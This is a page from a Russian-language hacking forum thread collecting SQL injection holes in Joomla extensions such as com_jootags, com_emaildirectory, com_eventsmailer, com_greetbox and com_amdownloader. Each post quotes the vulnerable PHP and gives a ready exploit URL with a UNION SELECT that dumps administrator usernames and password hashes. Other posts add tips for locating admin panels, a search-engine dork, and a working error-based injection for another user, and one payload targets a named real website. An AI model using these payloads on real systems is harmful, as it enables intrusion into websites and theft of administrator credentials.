[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDocument[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getType[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getName[/COLOR][COLOR="#007700"]() );

[/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JRequest[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getCmd[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'layout'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'default'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JComponentHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getParams[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'com_jootags'[/COLOR][COLOR="#007700"]);;

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getView[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$viewType[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]'base_path'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]_basePath[/COLOR][COLOR="#007700"]));

        if ([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'tags'[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setModel[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);

        }

=====>>>>    list([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getTagByTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tag'[/COLOR][COLOR="#007700"]]);

        

[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];

        if ([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$model[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getData[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limitstart[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tag_title[/COLOR][COLOR="#007700"]);

        } else {

[/COLOR][COLOR="#0000BB"]$document[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]JText[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Tags'[/COLOR][COLOR="#007700"]));

        }

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLayout[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$viewLayout[/COLOR][COLOR="#007700"]);        

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$items[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$params[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR]

exploit:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//j15/index.php?option=com_jootags&itemid=8&view=model&tag=-666++union+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),9,10,11,12+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

[/COLOR][/COLOR]

Достаем url ресурса из БД.

Кто знает - поймет. Ох сколько я мучался найдя таблицы джумлы в базе, на которую ссылается, к примеру, какой-нибудь wp'шный сайт. И как всегда - ответ перед носом!

SELECT link FROM jos_menu WHERE alias = adminlink [version 1.5]

На выходе увидите урл админки, конечно же с текущим ресурсом!

p.s. z0mbyak, если ты это знал и не запостил где-нить...ц...на сколько ж я ресурсов забил из-за этого...ты бы знал...

============

UPDATE #1

Такс...то что выше - это для версии 1.5

SELECT link FROM jos_menu WHERE title = admin [version 1.6]

============

UPDATE #2 (метод для всех веток)

Код:

Code:
SELECT name FROM u158069.joomla_menu LIMIT 0,1 (а)

SELECT link FROM u158069.joomla_menu LIMIT 0,1 (b)

Код:

Code:
dork: inurl:b intext:a

#227

12.09.2011, 03:12

Unknown

Guest

Сообщений: n/a

Провел на форуме:
4100

Репутация: 74

com_email-directory SQL-inj [1.5 && 1.6]

image.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]// formula string

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mosConfig_host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mosConfig_user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mosConfig_password[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Could not connect"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mosConfig_db[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#DD0000"]"Could not select database"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT email FROM[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$mosConfig_dbprefix[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]emails_list WHERE id='[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"MySQL query: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" failed with error: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

}

...

[/COLOR][/COLOR]

exploit:

Код:

Code:
http://j15/index.php?option=com_emaildirectory&nshow=image&view=photos&id=-666++union+select+group_concat(username,0x3a,password+SEPARATOR+0x3c62723e)+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

com_eventsmailer SQL-inj in LIMIT [1.5]

simpleshow.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

    function[/COLOR][COLOR="#0000BB"]getAdminSettings[/COLOR][COLOR="#007700"]() {

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM #__eventsmailer LIMIT[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'max']"[/COLOR][COLOR="#007700"];

    

[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();

    

[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]= array();

    

        foreach([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"];

        }

    

        return[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"];

    }

...

[/COLOR][/COLOR]

exploit:

Код:

Code:
http://j15/index.php?option=com_eventsmailer&view=events&max=-666666666++union+select+1,2,3,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),5,6,7+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

com_greetbox SQL-inj in LIMIT [1.5 && 1.6]

funcs.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$component_params[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]JComponentHelper[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getParams[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'com_greetbox'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$greeting[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$component_params[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'default_greeting'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$fromsite[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from #__greetbox LIMIT[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mva'l]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();

    foreach([/COLOR][COLOR="#0000BB"]$myrows[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$pattern[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_quote[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pattern[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"]);

        if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/[/COLOR][COLOR="#0000BB"]$pattern[/COLOR][COLOR="#DD0000"]/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fromsite[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$greeting[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$myrow[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]greeting[/COLOR][COLOR="#007700"];

            break;

        }

    }

...

[/COLOR][/COLOR]

exploit:

Код:

Code:
http://j15/index.php?option=com_greetbox&view=boxes&mval=-999999999+union+select+1,2,3,4,5,group_concat(username,0x3a,password+SEPARATOR+0x3c62723e),7,8,9+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72--

#228

14.09.2011, 20:20

silveran

Постоянный

Регистрация: 02.05.2005

Сообщений: 786

Провел на форуме:
807041

Репутация: 263

Отправить сообщение для silveran с помощью ICQ

http://www.exploit-db.com/exploits/16992/

кто подскажет как пользоваться этим? если можно более детально, ...

С Уважением Силверан...

#229

14.09.2011, 21:06

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от silveran

silveran said:
http://www.exploit-db.com/exploits/16992/
кто подскажет как пользоваться этим? если можно более детально, ...
С Уважением Силверан...

Код:

Code:
http://site/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=(select(max(1))from(mysql.user)group+by(concat(version(),0x00,floor(rand(0)*2))))--+&filter_order_Dir=2&limit=3&limitstart=4

#230

18.11.2011, 11:40

Unknown

Guest

Сообщений: n/a

Провел на форуме:
4100

Репутация: 74

com_amdownloadersql-inj

vurnel.param:pathid

Код:

Code:
http://adatmagus.hu/jm/index.php?option=com_amdownloader&task=showfiles&pathid=-8 UNION SELECT 1,2,group_concat(username,0x3a,password separator 0x3c62723e),4 from jos_users --

Страница 23 из 37

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[Обзор уязвимостей в форумных движках]	Grey	Уязвимости CMS / форумов	49	02.04.2015 17:48
Обзор бесплатных Cms	em00s7	PHP	16	03.07.2009 13:13
Cms	Cawabunga	PHP	20	05.08.2007 00:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход